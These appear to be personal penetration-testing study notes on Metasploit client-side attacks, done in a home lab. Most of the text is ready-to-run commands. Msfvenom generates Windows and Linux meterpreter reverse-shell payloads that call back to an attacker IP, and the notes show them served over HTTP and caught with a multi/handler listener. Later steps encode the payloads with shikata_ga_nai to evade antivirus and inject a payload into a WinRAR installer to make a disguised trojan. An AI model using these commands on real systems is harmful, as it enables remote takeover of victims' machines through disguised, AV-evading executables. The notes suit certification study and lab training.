Client-Side Attacks with MSF
A client-side attack is a security breach that happens on the client side.
- Social engineering techniques take advantage of human vulnerabilities
- Require user-interaction to open malicious documents or portable executables (
PEs
) - The payload is stored on the client's system
- Attackers have to pay attention to Anti Virus detection
❗ Advanced modern antivirus solutions detects and blocks this type of payloads very easily.
Msfvenom Payloads
msfvenom
- a Metasploit standalone payload generator and encoder
e.g.
- generate a malicious meterpreter payload, transfer it to a client target; once executed it will connect back to the payload handler and provides with remote access
- List available payloads
msfvenom --list payloads
- When generating a payload the exact name of the payload must be specified
- target operating system
- target O.S. architecture (x64, x86 ...)
- payload type
- protocol used to connect back (depends on requirements)
e.g.
of Staged payload
windows/x64/meterpreter/reverse_tcp
e.g.
of Non-Staged payload
windows/x64/meterpreter_reverse_https
- Generate a Windows payload with
msfvenom
**32bit payload:msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f exe > /home/kali/certs/ejpt/Windows_Payloads/payloadx86.exe# LHOST = Attacker IP address64bit payload:**msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f exe > /home/kali/certs/ejpt/Windows_Payloads/payloadx64.exe
- List the output formats available
msfvenom --list formatsFramework Executable Formats [--format <value>]===============================================Name----aspaspxaspx-exeaxis2dllducky-script-pshelfelf-soexeexe-onlyexe-serviceexe-smallhta-pshjarjsploop-vbsmachomsimsi-nouacosx-apppshpsh-cmdpsh-netpsh-reflectionpython-reflectionvbavba-exevba-pshvbswarFramework Transform Formats [--format <value>]==============================================Name----base32base64bashccsharpdwdwordgogolanghexjavajs_bejs_lenimnimlangnumperlplpowershellps1pypythonrawrbrubyrustrustlangshvbapplicationvbscript
- Generate a Linux payload with
msfvenom
**32bit payload:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f elf > /home/kali/certs/ejpt/Linux_Payloads/payloadx8664bit payload:**msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f elf > /home/kali/certs/ejpt/Linux_Payloads/payloadx64
- 📌 Platform and architecture are auto selected if not specified, based on the selected payload
The transferring method onto the target system depends on the type of the social engineering technique.
e.g.
A simple web server can be set up on the attacker system to serve the payload files and a handler to receive the connection back from the target system
cd /home/kali/certs/ejpt/Windows_Payloadssudo python -m http.server 8080
- To deal with a
meterpreter
payload, an appropriate listener is necessary to handle the reverse connection, themulti/handler
Metasploit module in this case
msfconsole -quse multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.31.128set LPORT 1234run
- Download the payload on the Windows 2008 system (in this case my home lab VM) from this link
http://192.168.31.128:8080
- Run the
payloadx86.exe
payload on the target
- The
meterpreter
session on the attacker machine should be opened
Same example with the linux/x86/meterpreter/reverse_tcp
Linux payload executed on the Kali VM.
Signature based Antivirus solutions can detect malicious files or executables. Older AV solutions can be evaded by encoding the payloads.
- ❗ This kind of attack vector is outdated and hardly used today.
- May work on legacy old O.S. like Windows 7 or older.
🗒️ Payload Encoding involves changing the payload shellcode with the aim of changing the payload signature.
🗒️ Shellcode is the code typically used as a payload for exploitation, that provides with a remote command shell on the target system.msfvenom --list encodersmsfvenom --list encoders
- Excellent encoders are
cmd/powershell_base64
andx86/shikata_ga_nai
- Generate a Win x86 payload and encode it with
shikata_ga_nai
:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -e x86/shikata_ga_nai -f exe > /home/kali/certs/ejpt/Windows_Payloads/encodedx86.exemsfvenom shikata_ga_nai Win
- The payload can be encoded as often as desired by increasing the number of iterations.
- The more iterations, the better chances to bypass an Antivirus. Use
-i
option.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > /home/kali/certs/ejpt/Windows_Payloads/encodedx86.exe
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f elf > /home/kali/certs/ejpt/Linux_Payloads/encodedx86msfvenom shikata_ga_nai Linux
- Test each of the above generated payloads, like before
cd /home/kali/certs/ejpt/Windows_Payloadssudo python -m http.server 8080msfconsole -quse multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.31.128set LPORT 1234run
📌 Modern antivirus detects and blocks the encoded payload as soon as the download is started:
🗒️ Windows Portable Executable (PE) is a file format for executables, object code, DLLs and others, used in 32-bit and 64-bit Windows O.S.
- Download a portable executable,
e.g.
WinRAR - Payloads can be injected into PEs with
msfvenom
with the-x
and-k
options
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -e x86/shikata_ga_nai -i 10 -f exe -x winrar-x32-621.exe > /home/kali/certs/ejpt/Windows_Payloads/winrar.execd /home/kali/certs/ejpt/Windows_Payloadssudo python -m http.server 8080msfconsole -quse multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.31.128set LPORT 1234run
- Transfer and run the
winrar.exe
file to the target O.S. - File description is kept, but not its functionality.
- Proceed with the Post Exploitation module to migrate the process into another one, in the
meterpreter
session
run post/windows/manage/migrate
Automation with Resource Scripts
Repetitive tasks and commands can be automated using MSF resource scripts (same as batch scripts).
- Almost every MSF command can be automated.
ls -al /usr/share/metasploit-framework/scripts/resource/usr/share/metasploit-framework/scripts/resource**e.g. 1
**
- Automate the process of setting up a handler for the generated payloads, by creating a new
handler.rc
file
nano handler.rc# Insert the following lines# by specifying the commands sequentiallyuse multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.31.128set LPORT 1234run# Save it and exit
- Load and run the recourse script in
msfconsole
msfconsole -q -r handler.rcmsfconsole -q -r handler.rc**e.g. 2
nano portscan.rc# Insert the following lines# by specifying the commands sequentiallyuse auxiliary/scanner/portscan/tcpset RHOSTS 192.168.31.131run# Save it and exitmsfconsole -q -r portscan.rcmsfconsole -q -r portscan.rce.g. 3
**nano db_status.rcdb_statusworkspaceworkspace -a TESTmsfconsole -q -r db_status.rc
- 📌 Load up a resource script from within the
msfconsole
with theresource
command
resource /home/kali/certs/ejpt/resource_scripts/handler.rc
- Typed in commands in a new
msfconsole
session, can be exported in a new resource script
makerc /home/kali/certs/ejpt/resource_scripts/portscan2.rc